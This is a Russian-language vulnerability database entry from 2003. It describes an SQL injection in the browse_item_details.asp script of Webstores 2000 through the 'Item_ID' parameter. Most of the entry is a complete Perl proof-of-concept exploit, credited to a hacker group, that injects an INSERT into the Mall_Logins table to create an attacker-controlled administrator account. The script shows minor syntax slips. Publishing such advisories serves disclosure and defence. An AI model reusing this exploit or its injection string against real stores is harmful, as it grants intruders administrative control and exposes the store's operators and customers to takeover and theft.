Дата публикации: | 04.06.2003 |
Всего просмотров: | 2774 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в Webstores 2000. Удаленный пользователь может выполнять SQL команды на целевой системе, чтобы получить административный доступ.
Сообщается, что сценарий browse_item_details.asp не фильтрует данные, представленные пользователем. Удаленный пользователь может представить специально обработанный URL, который внедрит SQL команды через 'Item_ID' параметр. Согласно сообщению, уязвимость может использоваться для добавления произвольной учетной записи на системе. Эксплоит: ws2k-ex.pl _START_ #!/usr/bin/perl -w #This exploit create user with Mall Admin priv. #You can login via /MallAdmin/ $pamer = " 1ndonesian Security Team (1st) ============================== http://bosen.net/releases/ ws2k-ex.pl, WebStore2000 SQL Injection Proof of Concept Exploit by : Bosen Discover by : Bosen Greetz to : AresU, TioEuy, syzwz, TioEuy, sakitjiwa, muthafuka all #hackers\@centrin.net.id/austnet.org"; use LWP::UserAgent; use HTTP::Request; use HTTP::Response; $| = 1; print $pamer; if ($#ARGV<3){ print "\n Usage: perl ws2k-ex.pl <uri>\n\n"; exit; my $legend = "$ARGV[0]/browse_item_details.asp?Item_ID="; $legend .= "''; insert into Mall_Logins values ('bosen','gembel')--"; my $bosen = LWP::UserAgent->new(); my $gembel = HTTP::Request->new(GET => $legend); my $dodol = $bosen->request($gembel); if ($dodol->is_error()) { printf " %s\n", $dodol->status_line; } else { print "Alhamdulillah :P\n"; } print "\n680165\n"; _EOF_Уязвимость обнаружена в Webstores 2000 6.0 |
Ссылки: | WebStore2000 SQL Injection Vulnerability & Exploit |